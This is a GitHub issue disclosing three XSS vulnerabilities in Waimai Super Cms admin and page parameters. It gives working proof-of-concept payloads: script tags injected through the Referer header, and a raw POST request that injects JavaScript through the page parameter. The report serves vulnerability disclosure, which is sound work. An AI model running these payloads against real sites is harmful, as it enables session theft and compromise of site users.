Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Three XSS vulnerabilities found in Waimai Super Cms #16

Open
Binarytree200 opened this issue Dec 8, 2019 · 0 comments
Open

Three XSS vulnerabilities found in Waimai Super Cms #16

Binarytree200 opened this issue Dec 8, 2019 · 0 comments

Comments

@Binarytree200
Copy link

In waimai Super Cms master, there is an XSS vulnerability via the /admin.php?m=Config&a=add and /admin.php/Link/addsave Referer parameter, /?delURL=1&url=x&page= page parameter

#1
Payload: Referer: '"><script>alert(123)</script>

image

image

image

#2
Payload: Referer: '"><script>alert(456)</script>

image

image

image

#3
Payload:
POST /?delURL=1&url=x&page=%22;alert(xssone);%20var%20d=%22 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://localhost/admin.php?&m=Public&a=login
Cookie: PHPSESSID=bld8qdt5dvpos2iv44l50g7196
Connection: keep-alive
Host: localhost
Content-Length: 0
Accept: /
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded

image

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant